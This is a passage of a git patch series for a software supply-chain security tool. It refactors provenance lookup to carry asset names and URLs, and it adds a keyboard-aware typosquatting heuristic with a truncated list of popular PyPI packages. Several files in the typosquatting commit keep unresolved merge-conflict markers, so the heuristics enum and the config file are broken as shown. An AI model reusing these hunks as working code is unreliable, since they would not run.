find_provenance(self, purl: PackageURL) -> list[InTotoPayload]: + def find_provenance(self, purl: PackageURL) -> list[ProvenanceAsset]: """Find the provenance file(s) of the passed PURL. Parameters @@ -54,8 +64,8 @@ def find_provenance(self, purl: PackageURL) -> list[InTotoPayload]: Returns ------- - list[InTotoPayload] - The provenance payload, or an empty list if not found. + list[ProvenanceAsset] + The provenance asset, or an empty list if not found. """ logger.debug("Seeking provenance of: %s", purl) @@ -88,7 +98,7 @@ def find_provenance(self, purl: PackageURL) -> list[InTotoPayload]: logger.debug("Provenance finding not supported for PURL type: %s", purl.type) return [] - def _find_provenance(self, discovery_functions: list[partial[list[InTotoPayload]]]) -> list[InTotoPayload]: + def _find_provenance(self, discovery_functions: list[partial[list[ProvenanceAsset]]]) -> list[ProvenanceAsset]: """Find the provenance file(s) using the passed discovery functions. Parameters @@ -99,7 +109,7 @@ def _find_provenance(self, discovery_functions: list[partial[list[InTotoPayload] Returns ------- list[InTotoPayload] - The provenance payload(s) from the first successful function, or an empty list if none were. + The provenance asset(s) from the first successful function, or an empty list if none were. """ if not discovery_functions: return [] @@ -114,7 +124,7 @@ def _find_provenance(self, discovery_functions: list[partial[list[InTotoPayload] return [] -def find_npm_provenance(purl: PackageURL, registry: NPMRegistry) -> list[InTotoPayload]: +def find_npm_provenance(purl: PackageURL, registry: NPMRegistry) -> list[ProvenanceAsset]: """Find and download the NPM based provenance for the passed PURL. Two kinds of attestation can be retrieved from npm: "Provenance" and "Publish". The "Provenance" attestation @@ -131,8 +141,8 @@ def find_npm_provenance(purl: PackageURL, registry: NPMRegistry) -> list[InTotoP Returns ------- - list[InTotoPayload] - The provenance payload(s), or an empty list if not found. + list[ProvenanceAsset] + The provenance asset(s), or an empty list if not found. """ if not registry.enabled: logger.debug("The npm registry is not enabled.") @@ -178,16 +188,19 @@ def find_npm_provenance(purl: PackageURL, registry: NPMRegistry) -> list[InTotoP publish_payload = load_provenance_payload(signed_download_path) except LoadIntotoAttestationError as error: logger.error("Error while loading publish attestation: %s", error) - return [provenance_payload] + return [ProvenanceAsset(provenance_payload, npm_provenance_asset.name, npm_provenance_asset.url)] - return [provenance_payload, publish_payload] + return [ + ProvenanceAsset(provenance_payload, npm_provenance_asset.name, npm_provenance_asset.url), + ProvenanceAsset(publish_payload, npm_provenance_asset.name, npm_provenance_asset.url), + ] except OSError as error: logger.error("Error while storing provenance in the temporary directory: %s", error) return [] -def find_gav_provenance(purl: PackageURL, registry: JFrogMavenRegistry) -> list[InTotoPayload]: +def find_gav_provenance(purl: PackageURL, registry: JFrogMavenRegistry) -> list[ProvenanceAsset]: """Find and download the GAV based provenance for the passed PURL. Parameters @@ -199,8 +212,8 @@ def find_gav_provenance(purl: PackageURL, registry: JFrogMavenRegistry) -> list[ Returns ------- - list[InTotoPayload] | None - The provenance payload if found, or an empty list otherwise. + list[ProvenanceAsset] | None + The provenance asset if found, or an empty list otherwise. Raises ------ @@ -269,7 +282,7 @@ def find_gav_provenance(purl: PackageURL, registry: JFrogMavenRegistry) -> list[ if not is_witness_provenance_payload(provenance_payload, witness_verifier_config.predicate_types): continue - provenances.append(provenance_payload) + provenances.append(ProvenanceAsset(provenance_payload, provenance_asset.name, provenance_asset.url)) except OSError as error: logger.error("Error while storing provenance in the temporary directory: %s", error) @@ -281,7 +294,7 @@ def find_gav_provenance(purl: PackageURL, registry: JFrogMavenRegistry) -> list[ return provenances[:1] -def find_pypi_provenance(purl: PackageURL) -> list[InTotoPayload]: +def find_pypi_provenance(purl: PackageURL) -> list[ProvenanceAsset]: """Find and download the PyPI based provenance for the passed PURL. Parameters @@ -291,11 +304,11 @@ def find_pypi_provenance(purl: PackageURL) -> list[InTotoPayload]: Returns ------- - list[InTotoPayload] | None - The provenance payload if found, or an empty list otherwise. + list[ProvenanceAsset] + The provenance assets found, or an empty list otherwise. """ - attestation, verified = DepsDevRepoFinder.get_attestation(purl) - if not attestation: + attestation, url, verified = DepsDevRepoFinder.get_attestation(purl) + if not (attestation and url): return [] with tempfile.TemporaryDirectory() as temp_dir: @@ -306,7 +319,7 @@ def find_pypi_provenance(purl: PackageURL) -> list[InTotoPayload]: try: payload = load_provenance_payload(file_name) payload.verified = verified - return [payload] + return [ProvenanceAsset(payload, purl.name, url)] except LoadIntotoAttestationError as load_error: logger.error("Error while loading provenance: %s", load_error) return [] @@ -314,7 +327,7 @@ def find_pypi_provenance(purl: PackageURL) -> list[InTotoPayload]: def find_provenance_from_ci( analyze_ctx: AnalyzeContext, git_obj: Git | None, download_path: str -) -> InTotoPayload | None: +) -> ProvenanceAsset | None: """Try to find provenance from CI services of the repository. Note that we stop going through the CI services once we encounter a CI service @@ -409,7 +422,10 @@ def find_provenance_from_ci( download_provenances_from_ci_service(ci_info, download_path) # TODO consider how to handle multiple payloads here. - return ci_info["provenances"][0].payload if ci_info["provenances"] else None + if ci_info["provenances"]: + provenance = ci_info["provenances"][0] + return ProvenanceAsset(provenance.payload, provenance.asset.name, provenance.asset.url) + return None else: logger.debug("CI service not supported for provenance finding: %s", ci_service.name) diff --git a/src/macaron/provenance/provenance_verifier.py b/src/macaron/provenance/provenance_verifier.py index 174d09c6d..f366fe127 100644 --- a/src/macaron/provenance/provenance_verifier.py +++ b/src/macaron/provenance/provenance_verifier.py @@ -17,6 +17,7 @@ from macaron.config.defaults import defaults from macaron.config.global_config import global_config from macaron.provenance.provenance_extractor import ProvenancePredicate, SLSAGithubGenericBuildDefinitionV01 +from macaron.provenance.provenance_finder import ProvenanceAsset from macaron.repo_finder.commit_finder import AbstractPurlType, determine_abstract_purl_type from macaron.slsa_analyzer.analyze_context import AnalyzeContext from macaron.slsa_analyzer.asset import AssetLocator @@ -28,15 +29,15 @@ logger: logging.Logger = logging.getLogger(__name__) -def verify_provenance(purl: PackageURL, provenance: list[InTotoPayload]) -> bool: +def verify_provenance(purl: PackageURL, provenance_assets: list[ProvenanceAsset]) -> bool: """Verify the passed provenance. Parameters ---------- purl: PackageURL The PURL of the analysis target. - provenance: list[InTotoPayload] - The list of provenance. + provenance_assets: list[ProvenanceAsset] + The list of provenance assets. Returns ------- @@ -50,7 +51,7 @@ def verify_provenance(purl: PackageURL, provenance: list[InTotoPayload]) -> bool verification_function = None if purl.type == "npm": - verification_function = partial(verify_npm_provenance, purl, provenance) + verification_function = partial(verify_npm_provenance, purl, provenance_assets) # TODO other verification functions go here. @@ -61,31 +62,34 @@ def verify_provenance(purl: PackageURL, provenance: list[InTotoPayload]) -> bool return False -def verify_npm_provenance(purl: PackageURL, provenance: list[InTotoPayload]) -> bool: +def verify_npm_provenance(purl: PackageURL, provenance_assets: list[ProvenanceAsset]) -> bool: """Compare the unsigned payload subject digest with the signed payload digest, if available. Parameters ---------- purl: PackageURL The PURL of the analysis target. - provenance: list[InTotoPayload] - The provenances to verify. + provenance_assets: list[ProvenanceAsset] + The provenance assets to verify. Returns ------- bool True if the provenance was verified, or False otherwise. """ - if len(provenance) != 2: - logger.debug("Expected unsigned and signed provenance.") + if len(provenance_assets) != 2: + logger.debug("Expected unsigned and signed provenance assets.") return False - signed_subjects = provenance[1].statement.get("subject") + signed_provenance = provenance_assets[1].payload + unsigned_provenance = provenance_assets[0].payload + + signed_subjects = signed_provenance.statement.get("subject") if not signed_subjects: logger.debug("Missing signed subjects.") return False - unsigned_subjects = provenance[0].statement.get("subject") + unsigned_subjects = unsigned_provenance.statement.get("subject") if not unsigned_subjects: logger.debug("Missing unsigned subjects.") return False diff --git a/src/macaron/repo_finder/repo_finder_deps_dev.py b/src/macaron/repo_finder/repo_finder_deps_dev.py index 9d723c2d9..07b5e4f34 100644 --- a/src/macaron/repo_finder/repo_finder_deps_dev.py +++ b/src/macaron/repo_finder/repo_finder_deps_dev.py @@ -164,7 +164,7 @@ def get_latest_version(purl: PackageURL) -> tuple[PackageURL | None, RepoFinderI ) @staticmethod - def get_attestation(purl: PackageURL) -> tuple[dict | None, bool]: + def get_attestation(purl: PackageURL) -> tuple[dict | None, str | None, bool]: """Retrieve the attestation associated with the passed PURL. Parameters @@ -174,17 +174,18 @@ def get_attestation(purl: PackageURL) -> tuple[dict | None, bool]: Returns ------- - tuple[dict | None, bool] - The attestation, or None if not found, and a flag for whether it is verified. + tuple[dict | None, str | None, bool] + The attestation, or None if not found, the url of the attestation asset, + and a flag for whether the attestation is verified. """ if purl.type != "pypi": logger.debug("PURL type (%s) attestation not yet supported via deps.dev.") - return None, False + return None, None, False if not purl.version: latest_purl, _ = DepsDevRepoFinder.get_latest_version(purl) if not latest_purl: - return None, False + return None, None, False purl = latest_purl # Example of a PURL endpoint for deps.dev with '/' encoded as '%2F': @@ -194,7 +195,7 @@ def get_attestation(purl: PackageURL) -> tuple[dict | None, bool]: result = send_get_http(target_url, headers={}) if not result: - return None, False + return None, None, False attestation_keys = ["attestations"] if "version" in result: @@ -203,21 +204,22 @@ def get_attestation(purl: PackageURL) -> tuple[dict | None, bool]: result_attestations = json_extract(result, attestation_keys, list) if not result_attestations: logger.debug("No attestations in result.") - return None, False + return None, None, False if len(result_attestations) > 1: logger.debug("More than one attestation in result: %s", len(result_attestations)) attestation_url = json_extract(result_attestations, [0, "url"], str) if not attestation_url: logger.debug("No attestation reported for %s", purl) - return None, False + return None, None, False attestation_data = send_get_http(attestation_url, headers={}) if not attestation_data: - return None, False + return None, None, False return ( PyPIRegistry().extract_attestation(attestation_data), + attestation_url, json_extract(result_attestations, [0, "verified"], bool) or False, ) diff --git a/src/macaron/slsa_analyzer/analyzer.py b/src/macaron/slsa_analyzer/analyzer.py index e3957e875..d75b0d94e 100644 --- a/src/macaron/slsa_analyzer/analyzer.py +++ b/src/macaron/slsa_analyzer/analyzer.py @@ -357,15 +357,17 @@ def run_single( package_registries_info = self._populate_package_registry_info() provenance_is_verified = False + provenance_asset = None if not provenance_payload and parsed_purl: # Try to find the provenance file for the parsed PURL. provenance_finder = ProvenanceFinder() provenances = provenance_finder.find_provenance(parsed_purl) if provenances: - provenance_payload = provenances[0] + provenance_asset = provenances[0] + provenance_payload = provenance_asset.payload if provenance_payload.verified: provenance_is_verified = True - elif verify_provenance: + if verify_provenance: provenance_is_verified = provenance_verifier.verify_provenance(parsed_purl, provenances) # Try to extract the repository URL and commit digest from the Provenance, if it exists. @@ -490,10 +492,11 @@ def run_single( if not provenance_payload: # Look for provenance using the CI. with tempfile.TemporaryDirectory() as temp_dir: - provenance_payload = find_provenance_from_ci(analyze_ctx, git_obj, temp_dir) + provenance_asset = find_provenance_from_ci(analyze_ctx, git_obj, temp_dir) # If found, validate analysis target against new provenance. - if provenance_payload: + if provenance_asset: # If repository URL was not provided as input, check the one found during analysis. + provenance_payload = provenance_asset.payload if not repo_path_input and component.repository: repo_path_input = component.repository.remote_path provenance_repo_url = provenance_commit_digest = None @@ -538,7 +541,9 @@ def run_single( provenance_payload=provenance_payload, slsa_level=slsa_level, slsa_version=slsa_version, - # TODO Add release tag, release digest. + provenance_asset_name=provenance_asset.name if provenance_asset else None, + provenance_asset_url=provenance_asset.url if provenance_asset else None, + # TODO Add release digest. ) analyze_ctx.dynamic_data["validate_malware"] = validate_malware diff --git a/src/macaron/slsa_analyzer/checks/provenance_available_check.py b/src/macaron/slsa_analyzer/checks/provenance_available_check.py index 77fcf87fe..edcf070ce 100644 --- a/src/macaron/slsa_analyzer/checks/provenance_available_check.py +++ b/src/macaron/slsa_analyzer/checks/provenance_available_check.py @@ -19,8 +19,6 @@ logger: logging.Logger = logging.getLogger(__name__) -# TODO replace this check with the provenance verification check. - class ProvenanceAvailableException(MacaronError): """When there is an error while checking if a provenance is available.""" @@ -74,18 +72,27 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: CheckResultData The result of the check. """ - available = ( - ctx.dynamic_data["provenance_info"] - and ctx.dynamic_data["provenance_info"].provenance_payload - and not ctx.dynamic_data["is_inferred_prov"] - ) + provenance_info = None + inferred = False + if ctx.dynamic_data["provenance_info"]: + provenance_info = ctx.dynamic_data["provenance_info"] + inferred = ctx.dynamic_data["is_inferred_prov"] + + if not provenance_info or not provenance_info.provenance_payload or inferred: + return CheckResultData( + result_tables=[], + result_type=CheckResultType.FAILED, + ) + return CheckResultData( result_tables=[ ProvenanceAvailableFacts( confidence=Confidence.HIGH, + asset_name=provenance_info.provenance_asset_name, + asset_url=provenance_info.provenance_asset_url, ) ], - result_type=CheckResultType.PASSED if available else CheckResultType.FAILED, + result_type=CheckResultType.PASSED, ) diff --git a/tests/integration/cases/provenance_available/policy.dl b/tests/integration/cases/provenance_available/policy.dl new file mode 100644 index 000000000..e9fb2513a --- /dev/null +++ b/tests/integration/cases/provenance_available/policy.dl @@ -0,0 +1,17 @@ +/* Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. */ +/* Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. */ + +#include "prelude.dl" + +Policy("test_policy", component_id, "") :- + check_passed(component_id, "mcn_provenance_available_1"), + provenance_available_check(_, asset_name, asset_url), + asset_name = "toga", + asset_url = "https://pypi.org/integrity/toga/0.5.1/toga-0.5.1-py3-none-any.whl/provenance", + provenance(_, component_id, _, slsa_level, _, repo_url, commit_sha, _, asset_name, asset_url, _), + slsa_level = 2, + repo_url = "https://github.com/beeware/toga", + commit_sha = "ef1912b0a1b5c07793f9aa372409f5b9d36f2604". + +apply_policy_to("test_policy", component_id) :- + is_component(component_id, "pkg:pypi/toga@0.5.1"). diff --git a/tests/integration/cases/provenance_available/test.yaml b/tests/integration/cases/provenance_available/test.yaml new file mode 100644 index 000000000..cff789793 --- /dev/null +++ b/tests/integration/cases/provenance_available/test.yaml @@ -0,0 +1,20 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +description: | + Analyzing a PyPI PURL that has provenance available on the PyPI registry. + +tags: +- macaron-python-package + +steps: +- name: Run macaron analyze + kind: analyze + options: + command_args: + - -purl + - pkg:pypi/toga@0.5.1 +- name: Run macaron verify-policy to verify passed/failed checks + kind: verify + options: + policy: policy.dl diff --git a/tests/repo_finder/test_repo_finder_deps_dev.py b/tests/repo_finder/test_repo_finder_deps_dev.py index 9df584fc5..1de5fae25 100644 --- a/tests/repo_finder/test_repo_finder_deps_dev.py +++ b/tests/repo_finder/test_repo_finder_deps_dev.py @@ -165,7 +165,7 @@ def test_get_attestation_failures( httpserver.expect_request(target_url).respond_with_data(data) - result, _ = DepsDevRepoFinder().get_attestation(purl) + result, _, _ = DepsDevRepoFinder().get_attestation(purl) assert not result @@ -195,6 +195,7 @@ def test_get_attestation_success(httpserver: HTTPServer, deps_dev_service_mock: """ data = data.replace("*replace_url*", attestation_url) httpserver.expect_request(target_url).respond_with_data(data) - result, verified = DepsDevRepoFinder().get_attestation(purl) + result, url, verified = DepsDevRepoFinder().get_attestation(purl) assert result + assert url == attestation_url assert verified From 8dad2ae7944dbec952b5595cd3adea5614035e0d Mon Sep 17 00:00:00 2001 From: Raouane Amine Date: Tue, 3 Jun 2025 01:35:22 +0100 Subject: [PATCH 04/14] feat(security): add package name typosquatting detection (#1059) Signed-off-by: Amine --- .gitignore | 4 + src/macaron/config/defaults.ini | 14 + src/macaron/malware_analyzer/README.md | 7 +- .../pypi_heuristics/heuristics.py | 5 + .../metadata/typosquatting_presence.py | 296 + src/macaron/resources/popular_packages.txt | 5000 +++++++++++++++++ .../checks/detect_malicious_metadata_check.py | 7 +- .../pypi/test_typosquatting_presence.py | 88 + 8 files changed, 5417 insertions(+), 4 deletions(-) create mode 100644 src/macaron/malware_analyzer/pypi_heuristics/metadata/typosquatting_presence.py create mode 100644 src/macaron/resources/popular_packages.txt create mode 100644 tests/malware_analyzer/pypi/test_typosquatting_presence.py diff --git a/.gitignore b/.gitignore index ddf49dfd0..4893a7151 100644 --- a/.gitignore +++ b/.gitignore @@ -181,4 +181,8 @@ docs/_build bin/ requirements.txt .macaron_env_file +<<<<<<< HEAD .DS_Store +======= +**/.DS_Store +>>>>>>> 1c65d5f (feat(security): add package name typosquatting detection (#1059)) diff --git a/src/macaron/config/defaults.ini b/src/macaron/config/defaults.ini index 1111b3faf..5e5f6d9a3 100644 --- a/src/macaron/config/defaults.ini +++ b/src/macaron/config/defaults.ini @@ -600,5 +600,19 @@ major_threshold = 20 epoch_threshold = 3 # The number of days +/- the day of publish the calendar versioning day may be. day_publish_error = 4 +<<<<<<< HEAD # THe threshold for the number of repeated spaces in a line from the source code. repeated_spaces_threshold = +======= + +# The threshold ratio for two packages to be considered similar. +distance_ratio_threshold = 0.95 +# The Keyboard cost for two characters that are close to each other on the keyboard. +keyboard = 0.8 +# The scaling factor for the jaro winkler distance. +scaling = 0.15 +# The cost for two characters that are not close to each other on the keyboard. +cost = 1.0 +# The path to the file that contains the list of popular packages. +popular_packages_path = +>>>>>>> 1c65d5f (feat(security): add package name typosquatting detection (#1059)) diff --git a/src/macaron/malware_analyzer/README.md b/src/macaron/malware_analyzer/README.md index d5d30a670..af8451279 100644 --- a/src/macaron/malware_analyzer/README.md +++ b/src/macaron/malware_analyzer/README.md @@ -52,6 +52,11 @@ When a heuristic fails, with `HeuristicResult.FAIL`, then that is an indicator b - **Rule**: Return `HeuristicResult.FAIL` if the major or epoch is abnormally high; otherwise, return `HeuristicResult.PASS`. - **Dependency**: Will be run if the One Release heuristic fails. +10. **Typosquatting Presence** + - **Description**: Checks if the package name is suspiciously similar to any package name in a predefined list of popular packages. The similarity check incorporates the Jaro-Winkler distance and considers keyboard layout proximity to identify potential typosquatting. + - **Rule**: Return `HeuristicResult.FAIL` if the similarity ratio between the package name and any popular package name meets or exceeds a defined threshold; otherwise, return `HeuristicResult.PASS`. + - **Dependency**: None. + ### Contributing When contributing an analyzer, it must meet the following requirements: @@ -64,7 +69,7 @@ When contributing an analyzer, it must meet the following requirements: - Ensure it is assigned to the `problog_result_access` string variable, otherwise it will not be queried and evaluated. - Assign a rule ID to the rule. This will be used to backtrack to determine if it was triggered. - Make sure to wrap pass/fail statements in `passed()` and `failed()`. Not doing so may result in undesirable behaviour, see the comments in the model for more details. - - If there are commonly used combinations introduced by adding the heuristic, combine and justify them at the top of the static model (see `quickUndetailed` and `forceSetup` as current examples). + - If there are commonly used combinations introduced by adding the heuristic, combine and justify them at the top of the static model (see `quickUndetailed` and `forceSetup` as current examples). ### Confidence Score Motivation diff --git a/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py b/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py index 3b23e13f7..b9f743a55 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py @@ -37,8 +37,13 @@ class Heuristics(str, Enum): #: Indicates that the package has an unusually large version number for a single release. ANOMALOUS_VERSION = "anomalous_version" +<<<<<<< HEAD #: Indicates that the package has a lot of white spaces or invisible characters in the code. WHITE_SPACES = "white_spaces" +======= + #: Indicates that the package name is similar to a popular package. + TYPOSQUATTING_PRESENCE = "typosquatting_presence" +>>>>>>> 1c65d5f (feat(security): add package name typosquatting detection (#1059)) class HeuristicResult(str, Enum): diff --git a/src/macaron/malware_analyzer/pypi_heuristics/metadata/typosquatting_presence.py b/src/macaron/malware_analyzer/pypi_heuristics/metadata/typosquatting_presence.py new file mode 100644 index 000000000..dbeb466b6 --- /dev/null +++ b/src/macaron/malware_analyzer/pypi_heuristics/metadata/typosquatting_presence.py @@ -0,0 +1,296 @@ +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +"""Analyzer checks if there is typosquatting presence in the package name.""" +import logging +import os + +from macaron import MACARON_PATH +from macaron.config.defaults import defaults +from macaron.errors import HeuristicAnalyzerValueError +from macaron.json_tools import JsonType +from macaron.malware_analyzer.pypi_heuristics.base_analyzer import BaseHeuristicAnalyzer +from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult, Heuristics +from macaron.slsa_analyzer.package_registry.pypi_registry import PyPIPackageJsonAsset + +logger = logging.getLogger(__name__) + + +class TyposquattingPresenceAnalyzer(BaseHeuristicAnalyzer): + """Check whether the PyPI package has typosquatting presence.""" + + KEYBOARD_LAYOUT = { + "1": (0, 0), + "2": (0, 1), + "3": (0, 2), + "4": (0, 3), + "5": (0, 4), + "6": (0, 5), + "7": (0, 6), + "8": (0, 7), + "9": (0, 8), + "0": (0, 9), + "-": (0, 10), + "q": (1, 0), + "w": (1, 1), + "e": (1, 2), + "r": (1, 3), + "t": (1, 4), + "y": (1, 5), + "u": (1, 6), + "i": (1, 7), + "o": (1, 8), + "p": (1, 9), + "a": (2, 0), + "s": (2, 1), + "d": (2, 2), + "f": (2, 3), + "g": (2, 4), + "h": (2, 5), + "j": (2, 6), + "k": (2, 7), + "l": (2, 8), + "z": (3, 0), + "x": (3, 1), + "c": (3, 2), + "v": (3, 3), + "b": (3, 4), + "n": (3, 5), + "m": (3, 6), + } + + def __init__(self, popular_packages_path: str | None = None) -> None: + super().__init__( + name="typosquatting_presence_analyzer", heuristic=Heuristics.TYPOSQUATTING_PRESENCE, depends_on=None + ) + self.default_path = os.path.join(MACARON_PATH, "resources/popular_packages.txt") + if popular_packages_path: + self.default_path = popular_packages_path + self.popular_packages, self.distance_ratio_threshold, self.keyboard, self.scaling, self.cost = ( + self._load_defaults() + ) + + def _load_defaults(self) -> tuple[list[str], float, float, float, float]: + """Load default settings from defaults.ini. + + Returns + ------- + tuple[list[str], float, float, float, float]: + The popular packages list, distance ratio threshold, + keyboard awareness factor, scaling factor, and cost factor. + """ + section_name = "heuristic.pypi" + path = self.default_path + distance_ratio_threshold = 0.95 + keyboard = 0.8 + scaling = 0.15 + cost = 1.0 + + if defaults.has_section(section_name): + section = defaults[section_name] + path_from_config = section.get("popular_packages_path", self.default_path) + # Fall back to default if the path in defaults.ini is empty. + if path_from_config.strip(): + path = path_from_config + distance_ratio_threshold = section.getfloat("distance_ratio_threshold", 0.95) + keyboard = section.getfloat("keyboard", 0.8) + scaling = section.getfloat("scaling", 0.15) + cost = section.getfloat("cost", 1.0) + + if not path or not os.path.exists(path): + error_message = "Popular packages file not found or path not configured" + logger.debug(error_message) + raise HeuristicAnalyzerValueError(error_message) + + popular_packages_list = [] + try: + with open(path, encoding="utf-8") as file: + popular_packages_list = file.read().splitlines() + except OSError as error: + error_message = "Could not read popular packages file" + logger.debug(error_message) + raise HeuristicAnalyzerValueError(error_message) from error + + return ( + popular_packages_list, + distance_ratio_threshold, + keyboard, + scaling, + cost, + ) + + def are_neighbors(self, first_char: str, second_char: str) -> bool: + """Check if two characters are adjacent on a QWERTY keyboard. + + Adjacent characters are those that are next to each other + either horizontally, vertically, or diagonally. + + Parameters + ---------- + first_char : str + The first character. + second_char : str + The second character. + + Returns + ------- + bool + True if the characters are neighbors, False otherwise. + """ + coordinates1 = self.KEYBOARD_LAYOUT.get(first_char) + coordinates2 = self.KEYBOARD_LAYOUT.get(second_char) + if not coordinates1 or not coordinates2: + return False + return (abs(coordinates1[0] - coordinates2[0]) <= 1) and (abs(coordinates1[1] - coordinates2[1]) <= 1) + + def substitution_func(self, first_char: str, second_char: str) -> float: + """Calculate the substitution cost between two characters. + + Parameters + ---------- + first_char : str + The first character. + second_char : str + The second character. + + Returns + ------- + float + 0.0 if the characters are the same, `self.keyboard` if they are + neighbors on a QWERTY keyboard, otherwise `self.cost` . + """ + if first_char == second_char: + return 0.0 + if self.keyboard and self.are_neighbors(first_char, second_char): + return self.keyboard + return self.cost + + def jaro_distance(self, package_name: str, popular_package_name: str) -> float: + """Calculate the Jaro distance between two package names. + + Parameters + ---------- + package_name : str + The name of the package being analyzed. + popular_package_name : str + The name of a popular package to compare against. + + Returns + ------- + float + The Jaro distance between the two package names. + """ + if package_name == popular_package_name: + return 1.0 + + package_name_len = len(package_name) + popular_package_name_len = len(popular_package_name) + if package_name_len == 0 or popular_package_name_len == 0: + return 0.0 + + match_distance = max(package_name_len, popular_package_name_len) // 2 - 1 + + package_name_matches = [False] * package_name_len + popular_package_name_matches = [False] * popular_package_name_len + matches = 0 + transpositions = 0.0 # A float to handle partial costs. + + # Count matches. + for first_index in range(package_name_len): + start = max(0, first_index - match_distance) + end = min(first_index + match_distance + 1, popular_package_name_len) + for second_index in range(start, end): + if popular_package_name_matches[second_index]: + continue + if package_name[first_index] == popular_package_name[second_index]: + package_name_matches[first_index] = True + popular_package_name_matches[second_index] = True + matches += 1 + break + + if matches == 0: + return 0.0 + + # Count transpositions with possible keyboard awareness. + k = 0 + for index in range(package_name_len): + if package_name_matches[index]: + while not popular_package_name_matches[k]: + k += 1 + if package_name[index] != popular_package_name[k]: + transpositions += self.substitution_func(package_name[index], popular_package_name[k]) + k += 1 + + transpositions /= 2.0 # Adjust for transpositions being counted twice. + + return ( + matches / package_name_len + matches / popular_package_name_len + (matches - transpositions) / matches + ) / 3.0 + + def ratio(self, package_name: str, popular_package_name: str) -> float: + """Calculate the Jaro-Winkler distance ratio. + + Parameters + ---------- + package_name : str + The name of the package being analyzed. + popular_package_name : str + The name of a popular package to compare against. + + Returns + ------- + float + The Jaro-Winkler distance ratio, incorporating a prefix bonus + for common initial characters. + """ + scaling = self.scaling + jaro_dist = self.jaro_distance(package_name, popular_package_name) + prefix_length = 0 + max_prefix = 4 + for i in range(min(max_prefix, len(package_name), len(popular_package_name))): + if package_name[i] == popular_package_name[i]: + prefix_length += 1 + else: + break + + return jaro_dist + prefix_length * scaling * (1 - jaro_dist) + + def analyze(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicResult, dict[str, JsonType]]: + """Analyze the package. + + Parameters + ---------- + pypi_package_json: PyPIPackageJsonAsset + The PyPI package JSON asset object. + + Returns + ------- + tuple[HeuristicResult, dict[str, JsonType]]: + The result and related information collected during the analysis. + """ + if not self.popular_packages: + warning_message = "Popular packages file is empty" + logger.warning(warning_message) + return HeuristicResult.SKIP, {"warning": warning_message} + + package_name = pypi_package_json.component_name + for popular_package in self.popular_packages: + # If there is a popular packages file, check if the package name is similar to any of them. + if package_name == popular_package: + return HeuristicResult.PASS, {"package_name": package_name} + + distance_ratio = self.ratio(package_name, popular_package) + if distance_ratio >= self.distance_ratio_threshold: + logger.info( + "Potential typosquatting detected: '%s' is similar to popular package '%s' (ratio: %.3f)", + package_name, + popular_package, + distance_ratio, + ) + return HeuristicResult.FAIL, { + "package_name": package_name, + "popular_package": popular_package, + "similarity_ratio": distance_ratio, + } + + return HeuristicResult.PASS, {"package_name": package_name} diff --git a/src/macaron/resources/popular_packages.txt b/src/macaron/resources/popular_packages.txt new file mode 100644 index 000000000..02da7afeb --- /dev/null +++ b/src/macaron/resources/popular_packages.txt @@ -0,0 +1,5000 @@ +boto3 +urllib3 +setuptools +botocore +requests +certifi +aiobotocore +charset-normalizer +idna +typing-extensions +packaging +grpcio-status +python-dateutil +s3transfer +s3fs +six +numpy +pyyaml +fsspec +google-api-core +cryptography +pip +pydantic +attrs +cffi +pandas +pycparser +protobuf +markupsafe +jinja2 +rsa +importlib-metadata +pyasn1 +jmespath +aiohttp +platformdirs +click +wheel +pytz +zipp +colorama +pydantic-core +googleapis-common-protos +awscli +cachetools +filelock +pluggy +virtualenv +google-auth +wrapt +tzdata +pyjwt +pyasn1-modules +pytest +jsonschema +tomli +annotated-types +sniffio +pygments +anyio +h11 +iniconfig +psutil +pyarrow +rich +httpx +sqlalchemy +requests-oauthlib +multidict +yarl +grpcio +pyparsing +httpcore +tomlkit +frozenlist +docutils +oauthlib +pathspec +aiosignal +requests-toolbelt +tqdm +pillow +beautifulsoup4 +distlib +werkzeug +google-cloud-storage +more-itertools +exceptiongroup +scipy +greenlet +soupsieve +pyopenssl +deprecated +propcache +rpds-py +et-xmlfile +openpyxl +isodate +trove-classifiers +referencing +decorator +lxml +async-timeout +jsonschema-specifications +python-dotenv +aiohappyeyeballs +proto-plus +msgpack +grpcio-tools +poetry-core +markdown-it-py +google-cloud-core +sortedcontainers +pynacl +mypy-extensions +flask +coverage +websocket-client +mdurl +gitpython +shellingham +azure-core +psycopg2-binary +tenacity +google-resumable-media +asn1crypto +itsdangerous +opentelemetry-api +smmap +regex +bcrypt +gitdb +msal +langsmith +scikit-learn +google-crc32c +dill +keyring +ptyprocess +wcwidth +chardet +pexpect +matplotlib +paramiko +snowflake-connector-python +pyproject-hooks +tabulate +alembic +jeepney +blinker +build +opentelemetry-semantic-conventions +jaraco-classes +opentelemetry-sdk +fastjsonschema +rapidfuzz +networkx +importlib-resources +huggingface-hub +cloudpickle +starlette +fastapi +secretstorage +threadpoolctl +typedload +google-cloud-bigquery +backoff +ruamel-yaml +joblib +kiwisolver +google-api-python-client +sqlparse +fonttools +asgiref +dnspython +pkginfo +prompt-toolkit +cycler +google-auth-oauthlib +py4j +httplib2 +defusedxml +pyzmq +xmltodict +uritemplate +poetry-plugin-export +types-requests +docker +uvicorn +cachecontrol +grpc-google-iam-v1 +google-auth-httplib2 +pytest-cov +azure-identity +gunicorn +marshmallow +awswrangler +installer +azure-storage-blob +msal-extensions +babel +cython +langchain +openai +poetry +redis +distro +tzlocal +contourpy +ruamel-yaml-clib +ipython +toml +setuptools-scm +dulwich +isort +crashtest +black +nest-asyncio +mccabe +jaraco-functools +pycodestyle +traitlets +cleo +jaraco-context +transformers +hatchling +jedi +opentelemetry-proto +py +zstandard +jsonpointer +pymysql +parso +websockets +typer +sentry-sdk +tornado +prometheus-client +markdown +matplotlib-inline +kubernetes +mako +webencodings +pendulum +opentelemetry-exporter-otlp-proto-common +termcolor +types-python-dateutil +python-json-logger +asttokens +executing +orjson 